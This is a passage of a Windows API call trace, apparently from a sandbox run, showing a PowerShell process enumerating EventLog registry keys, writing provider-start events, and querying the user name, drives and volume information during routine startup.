lpcchName=0xed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.999] CoTaskMemFree (pv=0x1cf5e0) [0085.999] CoTaskMemFree (pv=0x0) [0085.999] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x354) returned 0x0 [0085.999] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.999] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x378) returned 0x0 [0085.999] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.999] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x37c) returned 0x0 [0085.999] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.999] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x380) returned 0x0 [0085.999] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0085.999] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x384) returned 0x0 [0086.000] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0086.000] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x388) returned 0x0 [0086.000] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0086.000] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x5 [0086.009] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x38c) returned 0x0 [0086.009] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x0) returned 0x2 [0086.010] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x390) returned 0x0 [0086.010] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2a8 | out: phkResult=0xed2a8*=0x394) returned 0x0 [0086.010] RegCloseKey (hKey=0x394) returned 0x0 [0086.010] RegCloseKey (hKey=0x374) returned 0x0 [0086.010] RegCloseKey (hKey=0x390) returned 0x0 [0086.012] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed218 | out: phkResult=0xed218*=0x390) returned 0x0 [0086.012] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.012] CoTaskMemFree (pv=0x0) [0086.012] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.012] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.012] CoTaskMemFree (pv=0x1cf5e0) [0086.012] CoTaskMemFree (pv=0x0) [0086.012] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.012] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.012] CoTaskMemFree (pv=0x1cf5e0) [0086.012] CoTaskMemFree (pv=0x0) [0086.012] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.012] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.012] CoTaskMemFree (pv=0x1cf5e0) [0086.012] CoTaskMemFree (pv=0x0) [0086.012] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.012] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.012] CoTaskMemFree (pv=0x1cf5e0) [0086.012] CoTaskMemFree (pv=0x0) [0086.012] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.012] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.012] CoTaskMemFree (pv=0x1cf5e0) [0086.012] CoTaskMemFree (pv=0x0) [0086.012] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.012] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.013] CoTaskMemFree (pv=0x1cf5e0) [0086.013] CoTaskMemFree (pv=0x0) [0086.013] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.013] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.013] CoTaskMemFree (pv=0x1cf5e0) [0086.013] CoTaskMemFree (pv=0x0) [0086.013] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.013] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.013] CoTaskMemFree (pv=0x1cf5e0) [0086.013] CoTaskMemFree (pv=0x0) [0086.013] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.013] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x1cf5e0, lpcchName=0xed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0086.013] CoTaskMemFree (pv=0x1cf5e0) [0086.013] CoTaskMemFree (pv=0x0) [0086.013] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x374) returned 0x0 [0086.013] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x2 [0086.013] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x394) returned 0x0 [0086.013] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x2 [0086.013] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x398) returned 0x0 [0086.013] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x2 [0086.014] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x39c) returned 0x0 [0086.014] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x2 [0086.014] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x3a0) returned 0x0 [0086.014] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x2 [0086.014] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x3a4) returned 0x0 [0086.014] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x2 [0086.014] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x5 [0086.016] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x3a8) returned 0x0 [0086.016] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x0) returned 0x2 [0086.016] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x3ac) returned 0x0 [0086.016] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed278 | out: phkResult=0xed278*=0x3b0) returned 0x0 [0086.016] RegCloseKey (hKey=0x3b0) returned 0x0 [0086.016] RegCloseKey (hKey=0x390) returned 0x0 [0086.017] RegCloseKey (hKey=0x3ac) returned 0x0 [0086.030] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b840008 [0086.032] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3accf20*="WSMan", lpRawData=0x3accc90) returned 1 [0086.036] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.038] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a3df0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0086.038] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0086.038] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3ad2408*="Alias", lpRawData=0x3ad2198) returned 1 [0086.041] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.043] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a3df0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0086.043] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0086.043] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3ad79b0*="Environment", lpRawData=0x3ad7740) returned 1 [0086.044] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.045] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.045] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0086.045] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0086.045] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xed0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0086.045] SetErrorMode (uMode=0x1) returned 0x1 [0086.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xed2c0 | out: lpFileInformation=0xed2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0086.045] SetErrorMode (uMode=0x1) returned 0x1 [0086.110] GetLogicalDrives () returned 0x4 [0086.129] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.130] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.130] SetErrorMode (uMode=0x1) returned 0x1 [0086.131] CoTaskMemAlloc (cb=0x68) returned 0x1b282f80 [0086.131] CoTaskMemAlloc (cb=0x68) returned 0x1b282ff0 [0086.131] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b282f80, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xed290, lpMaximumComponentLength=0xed28c, lpFileSystemFlags=0xed288, lpFileSystemNameBuffer=0x1b282ff0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xed290*=0x705ba84c, lpMaximumComponentLength=0xed28c*=0xff, lpFileSystemFlags=0xed288*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.132] CoTaskMemFree (pv=0x1b282f80) [0086.132] CoTaskMemFree (pv=0x1b282ff0) [0086.132] SetErrorMode (uMode=0x1) returned 0x1 [0086.132] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.133] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.133] SetErrorMode (uMode=0x1) returned 0x1 [0086.133] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed230 | out: lpFileInformation=0xed230*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0086.133] SetErrorMode (uMode=0x1) returned 0x1 [0086.133] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.134] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xece80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.134] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.134] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.134] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.135] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.135] SetErrorMode (uMode=0x1) returned 0x1 [0086.135] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed060 | out: lpFileInformation=0xed060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0086.135] SetErrorMode (uMode=0x1) returned 0x1 [0086.135] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.135] SetErrorMode (uMode=0x1) returned 0x1 [0086.135] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed060 | out: lpFileInformation=0xed060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0086.135] SetErrorMode (uMode=0x1) returned 0x1 [0086.135] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.136] SetErrorMode (uMode=0x1) returned 0x1 [0086.136] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed100 | out: lpFileInformation=0xed100*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0086.136] SetErrorMode (uMode=0x1) returned 0x1 [0086.136] CoTaskMemAlloc (cb=0x804) returned 0x1b2a3df0 [0086.136] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a3df0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0086.136] CoTaskMemFree (pv=0x1b2a3df0) [0086.136] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.136] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0086.137] CoTaskMemFree (pv=0x1cf5e0) [0086.137] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3adea08*="FileSystem", lpRawData=0x3ade798) returned 1 [0086.138] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.138] CoTaskMemFree (pv=0x1f7410) [0086.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.140] CoTaskMemAlloc (cb=0x804) returned 0x1b2a3df0 [0086.140] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a3df0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0086.140] CoTaskMemFree (pv=0x1b2a3df0) [0086.140] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.140] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0086.140] CoTaskMemFree (pv=0x1cf5e0) [0086.141] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3ae41f8*="Function", lpRawData=0x3ae3f88) returned 1 [0086.142] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.142] CoTaskMemFree (pv=0x1f7410) [0086.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, 